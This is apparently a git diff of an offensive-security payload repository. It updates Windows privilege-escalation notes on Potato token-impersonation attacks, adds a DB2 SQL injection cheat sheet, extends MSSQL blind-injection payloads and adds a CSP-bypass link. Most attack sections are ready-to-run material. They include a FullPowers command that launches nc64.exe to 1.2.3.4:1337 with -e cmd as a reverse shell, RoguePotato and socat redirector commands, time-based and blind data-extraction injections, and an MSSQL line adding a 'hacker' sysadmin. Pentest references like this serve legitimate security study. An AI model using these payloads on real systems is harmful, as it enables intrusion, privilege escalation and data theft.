||||
```
|
||||
|
||||
## EoP - Runas
|
||||
|
||||
Use the `cmdkey` to list the stored credentials on the machine.
|
||||
@ -1068,7 +1134,6 @@ SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
|
||||
c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
|
||||
```
|
||||
|
||||
|
||||
### Meterpreter getsystem and alternatives
|
||||
|
||||
```powershell
|
||||
@ -1081,8 +1146,8 @@ python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
|
||||
|
||||
### RottenPotato (Token Impersonation)
|
||||
|
||||
Binary available at : https://github.com/foxglovesec/RottenPotato
|
||||
Binary available at : https://github.com/breenmachine/RottenPotatoNG
|
||||
* Binary available at : https://github.com/foxglovesec/RottenPotato
|
||||
* Binary available at : https://github.com/breenmachine/RottenPotatoNG
|
||||
|
||||
```c
|
||||
getuid
|
||||
@ -1101,10 +1166,12 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
|
||||
```
|
||||
|
||||
|
||||
### Juicy Potato (abusing the golden privileges)
|
||||
### Juicy Potato (Abusing the golden privileges)
|
||||
|
||||
Binary available at : https://github.com/ohpe/juicy-potato/releases
|
||||
:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +.
|
||||
> If the machine is **>= Windows 10 1809 & Windows Server 2019** - Try **Rogue Potato**
|
||||
> If the machine is **< Windows 10 1809 < Windows Server 2019** - Try **Juicy Potato**
|
||||
|
||||
* Binary available at : https://github.com/ohpe/juicy-potato/releases
|
||||
|
||||
1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
|
||||
|
||||
@ -1135,6 +1202,39 @@ Binary available at : https://github.com/ohpe/juicy-potato/releases
|
||||
[+] CreateProcessWithTokenW OK
|
||||
```
|
||||
|
||||
### Rogue Potato (Fake OXID Resolver)
|
||||
|
||||
* Binary available at https://github.com/antonioCoco/RoguePotato
|
||||
|
||||
```powershell
|
||||
# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
|
||||
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
|
||||
|
||||
# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine.
|
||||
# Use this if you have fw restrictions.
|
||||
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
|
||||
|
||||
# RoguePotato all in one with RogueOxidResolver running locally on port 9999
|
||||
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
|
||||
|
||||
#RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
|
||||
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
|
||||
```
|
||||
|
||||
### EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
|
||||
|
||||
* Binary available at https://github.com/zcgonvh/EfsPotato
|
||||
|
||||
```powershell
|
||||
# .NET 4.x
|
||||
csc EfsPotato.cs
|
||||
csc /platform:x86 EfsPotato.cs
|
||||
|
||||
# .NET 2.0/3.5
|
||||
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs
|
||||
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs
|
||||
```
|
||||
|
||||
|
||||
## EoP - Privileged File Write
|
||||
|
||||
@ -1349,3 +1449,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
|
||||
* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/)
|
||||
* [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1)
|
||||
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
|
||||
* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
|
208
SQL Injection/DB2 Injection.md
Normal file
208
SQL Injection/DB2 Injection.md
Normal file
@ -0,0 +1,208 @@
|
||||
# DB2 Injection
|
||||
|
||||
>
|
||||
|
||||
## Summary
|
||||
|
||||
* [DB2 Cheatsheet](#db2-cheatsheet)
|
||||
* [References](#references)
|
||||
|
||||
## DB2 Cheatsheet
|
||||
|
||||
### Version
|
||||
|
||||
```sql
|
||||
select versionnumber, version_timestamp from sysibm.sysversions;
|
||||
select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
|
||||
select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
|
||||
select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
|
||||
select service_level,bld_level from sysibmadm.env_inst_info
|
||||
```
|
||||
|
||||
### Comments
|
||||
|
||||
```sql
|
||||
select blah from foo -- comment like this (double dash)
|
||||
```
|
||||
|
||||
### Current User
|
||||
|
||||
```sql
|
||||
select user from sysibm.sysdummy1
|
||||
select session_user from sysibm.sysdummy1
|
||||
select system_user from sysibm.sysdummy1
|
||||
```
|
||||
|
||||
### List Users
|
||||
|
||||
DB2 uses OS accounts
|
||||
|
||||
```sql
|
||||
select distinct(authid) from sysibmadm.privileges -- priv required
|
||||
select grantee from syscat.dbauth -- incomplete results
|
||||
select distinct(definer) from syscat.schemata -- more accurate
|
||||
select distinct(grantee) from sysibm.systabauth -- same as previous
|
||||
```
|
||||
|
||||
### List Privileges
|
||||
|
||||
```sql
|
||||
select * from syscat.tabauth -- shows priv on tables
|
||||
select * from syscat.tabauth where grantee = current user -- shows privs for current user
|
||||
select * from syscat.dbauth where grantee = current user;;
|
||||
select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies
|
||||
```
|
||||
|
||||
### List DBA Accounts
|
||||
|
||||
```sql
|
||||
select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'
|
||||
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’
|
||||
```
|
||||
|
||||
### Current Database
|
||||
|
||||
```sql
|
||||
select current server from sysibm.sysdummy1
|
||||
```
|
||||
|
||||
### List Databases
|
||||
|
||||
```sql
|
||||
select distinct(table_catalog) from sysibm.tables
|
||||
SELECT schemaname FROM syscat.schemata;
|
||||
```
|
||||
|
||||
### List Columns
|
||||
|
||||
```sql
|
||||
select name, tbname, coltype from sysibm.syscolumns -- also valid syscat and sysstat
|
||||
```
|
||||
|
||||
### List Tables
|
||||
|
||||
```sql
|
||||
select table_name from sysibm.tables
|
||||
select name from sysibm.systables
|
||||
```
|
||||
|
||||
### Find Tables From Column Name
|
||||
|
||||
```sql
|
||||
select tbname from sysibm.syscolumns where name='username'
|
||||
```
|
||||
|
||||
### Select Nth Row
|
||||
|
||||
```sql
|
||||
select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
|
||||
```
|
||||
|
||||
### Select Nth Char
|
||||
|
||||
```sql
|
||||
select substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b
|
||||
```
|
||||
|
||||
### Bitwise AND/OR/NOT/XOR
|
||||
|
||||
```sql
|
||||
select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available bitandnot, bitor, bitxor, bitnot
|
||||
```
|
||||
|
||||
### ASCII Value
|
||||
|
||||
```sql
|
||||
Char select chr(65) from sysibm.sysdummy1 -- returns 'A'
|
||||
```
|
||||
|
||||
### Char -> ASCII Value
|
||||
|
||||
```sql
|
||||
select ascii('A') from sysibm.sysdummy1 -- returns 65
|
||||
```
|
||||
|
||||
### Casting
|
||||
|
||||
```sql
|
||||
select cast('123' as integer) from sysibm.sysdummy1
|
||||
select cast(1 as char) from sysibm.sysdummy1
|
||||
```
|
||||
|
||||
### String Concat
|
||||
|
||||
```sql
|
||||
select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns 'abc'
|
||||
select 'a' || 'b' from sysibm.sysdummy1 -- returns 'ab'
|
||||
```
|
||||
|
||||
|
||||
### IF Statement
|
||||
Seems only allowed in stored procedures. Use case logic instead.
|
||||
|
||||
### Case Statement
|
||||
|
||||
```sql
|
||||
select CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END from sysibm.sysdummy1
|
||||
```
|
||||
|
||||
|
||||
### Avoiding Quotes
|
||||
|
||||
```sql
|
||||
SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns “ADRI”. Works without select too
|
||||
```
|
||||
|
||||
### Time Delay
|
||||
|
||||
Heavy queries, for example: If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
|
||||
However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster.
|
||||
```sql
|
||||
' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
|
||||
```
|
||||
|
||||
### Serialize to XML (for error based)
|
||||
|
||||
```sql
|
||||
select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string
|
||||
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- Same but without repeated elements
|
||||
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
|
||||
```
|
||||
|
||||
### Command Execution and Local File Access
|
||||
|
||||
Seems it's only allowed from procedures or UDFs.
|
||||
|
||||
### Hostname/IP and OS INFO
|
||||
|
||||
```sql
|
||||
select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info -- requires priv
|
||||
```
|
||||
|
||||
### Location of DB Files
|
||||
|
||||
```sql
|
||||
select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv
|
||||
```
|
||||
|
||||
### System Config
|
||||
|
||||
```sql
|
||||
select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
|
||||
select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.
|
||||
```
|
||||
|
||||
### Default System Database
|
||||
|
||||
* SYSIBM
|
||||
* SYSCAT
|
||||
* SYSSTAT
|
||||
* SYSPUBLIC
|
||||
* SYSIBMADM
|
||||
* SYSTOOLs
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [DB2 SQL injection cheat sheet - Adrián - 20/05/2012](https://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/)
|
||||
* [DB2 SQL Injection Cheat Sheet - pentestmonkey](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
|
@ -2,9 +2,11 @@
|
||||
|
||||
## Summary
|
||||
|
||||
* [MSSQL comments](#mssql-comments)
|
||||
* [MSSQL version](#mssql-version)
|
||||
* [MSSQL database name](#mssql-database-name)
|
||||
* [MSSQL Comments](#mssql-comments)
|
||||
* [MSSQL User](#mssql-user)
|
||||
* [MSSQL Version](#mssql-version)
|
||||
* [MSSQL Hostname](#mssql-hostname)
|
||||
* [MSSQL Database name](#mssql-database-name)
|
||||
* [MSSQL List databases](#mssql-list-databases)
|
||||
* [MSSQL List columns](#mssql-list-columns)
|
||||
* [MSSQL List tables](#mssql-list-tables)
|
||||
@ -22,7 +24,7 @@
|
||||
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
||||
* [MSSQL Trusted Links](#mssql-trusted-links)
|
||||
|
||||
## MSSQL comments
|
||||
## MSSQL Comments
|
||||
|
||||
```sql
|
||||
-- comment goes here
|
||||
@ -33,6 +35,9 @@
|
||||
|
||||
```sql
|
||||
SELECT CURRENT_USER
|
||||
SELECT user_name();
|
||||
SELECT system_user;
|
||||
SELECT user;
|
||||
```
|
||||
|
||||
## MSSQL version
|
||||
@ -41,7 +46,14 @@ SELECT CURRENT_USER
|
||||
SELECT @@version
|
||||
```
|
||||
|
||||
## MSSQL database name
|
||||
## MSSQL Hostname
|
||||
|
||||
```sql
|
||||
SELECT HOST_NAME()
|
||||
SELECT @@hostname;
|
||||
```
|
||||
|
||||
## MSSQL Database name
|
||||
|
||||
```sql
|
||||
SELECT DB_NAME()
|
||||
@ -122,6 +134,13 @@ For string inputs : ' + cast((SELECT @@version) as int) + '
|
||||
## MSSQL Blind based
|
||||
|
||||
```sql
|
||||
AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
|
||||
|
||||
AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
|
||||
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
|
||||
|
||||
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
|
||||
|
||||
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
|
||||
|
||||
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
|
||||
@ -283,4 +302,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
|
||||
* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
|
||||
* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
|
||||
* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
|
||||
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
|
||||
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
|
||||
* [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - 28 January 2009](https://www.exploit-db.com/papers/12975)
|
@ -1004,7 +1004,9 @@ Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.wi
|
||||
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
|
||||
```
|
||||
|
||||
More JSONP endpoints available in [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
|
||||
More JSONP endpoints:
|
||||
* [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
|
||||
* [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)
|
||||
|
||||
### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user